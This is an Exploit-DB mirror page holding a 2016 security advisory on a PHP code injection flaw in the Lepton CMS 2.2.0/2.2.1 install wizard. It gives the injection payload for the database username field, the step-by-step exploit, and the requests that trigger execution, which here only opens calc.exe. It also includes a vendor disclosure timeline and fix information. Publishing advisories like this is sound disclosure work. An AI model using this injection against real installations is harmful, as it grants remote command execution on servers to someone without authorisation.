bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40248.txt
Offensive Security 29076928d8 DB: 2016-08-17 
10 new exploits

Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit
Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service

LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit
LifeType 1.0.4 - Multiple Vulnerabilities

Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit
Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service
cms-bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote Include
CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit
empris r20020923 - (phormationdir) Remote Include
aePartner 0.8.3 - (dir[data]) Remote Include
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC
empris r20020923 - (phormationdir) Remote File Inclusion
aePartner 0.8.3 - (dir[data]) Remote File Inclusion
SmartSiteCMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service Exploit
SmartSite CMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service

w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit
w-Agora 4.2.0 - (inc_dir) Remote File Inclusion

BitchX 1.1-final do_hook() Remote Denial of Service Exploit
BitchX 1.1-final - do_hook() Remote Denial of Service

BLOG:CMS 4.0.0k SQL Injection Exploit
BLOG:CMS 4.0.0k - SQL Injection

Sun Board 1.00.00 alpha Remote File Inclusion
Sun Board 1.00.00 alpha - Remote File Inclusion

Mailist 3.0 Insecure Backup/Local File Inclusion
Mailist 3.0 - Insecure Backup/Local File Inclusion

AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion
AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion
VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion

VoteBox 2.0 Votebox.php Remote File Inclusion
VoteBox 2.0 - Votebox.php Remote File Inclusion

TRG News 3.0 Script Remote File Inclusion
TRG News 3.0 Script - Remote File Inclusion

Vortex Portal 2.0 content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion

Shoutbox 1.0 Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - Shoutbox.php Remote File Inclusion

Ajaxmint Gallery 1.0 Local File Inclusion
Ajaxmint Gallery 1.0 - Local File Inclusion
Zabbix 2.2.x_ 3.0.x - SQL Injection
Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)
Zabbix 2.2.x / 3.0.x - SQL Injection
Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal
Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection
Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist
Nagios Log Server 1.4.1 - Multiple Vulnerabilities
Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities
Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV
2016-08-17 05:02:47 +00:00

141 lines
4.1 KiB
Text
Executable file
Raw Blame History

[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.lepton-cms.org
Product:
=================================
Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but full customizable Content Management System
(CMS).
Vulnerability Type:
===================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No input validation check is done on the "Database User" input field when
entering Lepton CMS setup information using the Install Wizard.
Therefore, a malicious user can input whatever they want in "config.php",
this can allow for PHP Remote Command Execution on the Host system.
e.g.
In the database username field, single quote to close "DB_USERNAME" value
then open our own PHP tags.
');?><?php exec(`calc.exe`);?>
Now in "config.php" the Database username becomes ===>
define('DB_USERNAME', '');?><?php exec(`calc.exe`);?>');
A security check attempt is made by Lepton to disallow making multiple HTTP
requests for "config.php". On line 3 of "config.php" file we find.
///////////////////////////////////////////////////////////////////////////////////////////////////////
if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted
to load \'config.php\' twice!!
Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
///////////////////////////////////////////////////////////////////////////////////////////////////////////
However, the security check is placed on line 3 way before "LEPTON_PATH"
has been defined allowing complete bypass of that access control check.
Now we can inject our own PHP code into the config allowing Remote Command
Execution or Local/Remote File Includes etc...
Next, make HTTP GET request to "http://victim-server/upload/install/save.php"
again and code execution will be achieved or request "config.php"
directly as the security check made on line 3 of "config.php" to prevent
multiple HTTP requests to "config.php" does NOT work anyhow.
In situations where an installation script is provided as part of a some
default image often available as a convenience by hosting providers, this
can
be used to gain code execution on the target system and bypass whatever
security access controls/restrictions etc.
References:
http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
Exploit code(s):
===============
1) At step 4 of Leptons Install Wizard, enter ');?><?php
exec(`calc.exe`);?> for Database User name, then fill in rest of fields
2) Click go to step 5 and fill in required fields, then click "Install
LEPTON"
3) Make HTTP GET request to:
http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
OR
http://localhost/LEPTON_stable_2.2.0/upload/config.php
BOOM pop calc.exe...
Disclosure Timeline:
===========================================================
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Reference in a new issue View git blame Copy permalink